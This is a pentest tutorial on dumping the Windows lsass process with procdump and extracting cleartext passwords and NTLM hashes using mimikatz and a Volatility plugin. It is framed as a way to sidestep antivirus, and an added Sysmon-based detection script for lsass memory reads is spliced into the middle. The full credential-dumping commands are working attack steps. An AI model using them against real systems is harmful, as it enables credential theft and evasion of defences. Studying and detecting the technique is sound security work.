Using Mimikatz to get cleartext passwords from an offline memory dump
Requirements:
- a recent version of Kali
- the mimikatz plugin for Volatility: wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
This applies when you have found an offline memory dump, or when you were able to dump the lsass process yourself using procdump.
The technique is useful in pentesting for obtaining cleartext passwords from a server without running “malicious” code on it, since mimikatz itself is flagged by most AV. In this way we avoid having to deal with antivirus evasion techniques and other headaches.
Procdump, on the other hand, is a tool developed by Mark Russinovich that lets us dump the memory space of a process to a file.
Note: taking the dump requires system privileges.
# For 32 bits
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# For 64 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
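From the defender's side, the procdump step above leaves a distinctive trace: a process other than the usual system components opens lsass.exe with memory-read rights. The following is an added example (not part of the original post) that flags such opens in Sysmon-style ProcessAccess (Event ID 10) records; the field names follow Sysmon's event schema, the allowlist is an assumption to tune per environment, and the events are constructed sample data.

```python
"""Flag process-memory reads of lsass.exe in Sysmon-style ProcessAccess
(Event ID 10) records. Added example, not code from the original post;
the sample events below are constructed, not real telemetry."""

# Win32 access rights a minidump of another process needs.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Assumption: images that legitimately open lsass.exe in this environment.
# Illustrative only; tune the allowlist to your own estate.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

def is_lsass_memory_read(event: dict) -> bool:
    """True if a non-allowlisted process opened lsass.exe with rights that
    allow reading its memory (the prerequisite for dumping credentials)."""
    if event.get("EventID") != 10:
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return False
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)  # Sysmon logs hex
    return bool(granted & PROCESS_VM_READ)

def flag_lsass_reads(events):
    """Return the source image of every suspicious lsass.exe memory read."""
    return [e["SourceImage"] for e in events if is_lsass_memory_read(e)]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\temp\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 1, "Image": r"C:\temp\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
]

if __name__ == "__main__":
    for src in flag_lsass_reads(SAMPLE_EVENTS):
        print("suspicious lsass.exe memory read by", src)
```

The allowlisted svchost.exe open and the ProcessCreate record are ignored; both opens that include PROCESS_VM_READ from non-allowlisted images are reported.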
Download the generated lsass.dmp file.
Launch mimikatz alpha against the lsass.dmp file with the commands:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
In the case of a full memory dump you can follow this reference, which I did not try myself but should work in VirtualBox: http://wiki.yobi.be/wiki/RAM_analysis#RAM_dump_with_VirtualBox:_via_pgmphystofile
-----
Now let's dig into Volatility and mimikatz.
By default Volatility does not ship with the mimikatz plugin, so you need to add it:
- cd /usr/share/volatility
- mkdir plugins
- cd plugins
- wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
- apt-get install python-crypto
- volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f halomar.dmp mimikatz
Here halomar.dmp is the memory dump file.
If you need the NTLM hashes:
volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f ~/Desktop/ctf/halomar.dmp hashdump
That's it. I did learn something new; hope you do too.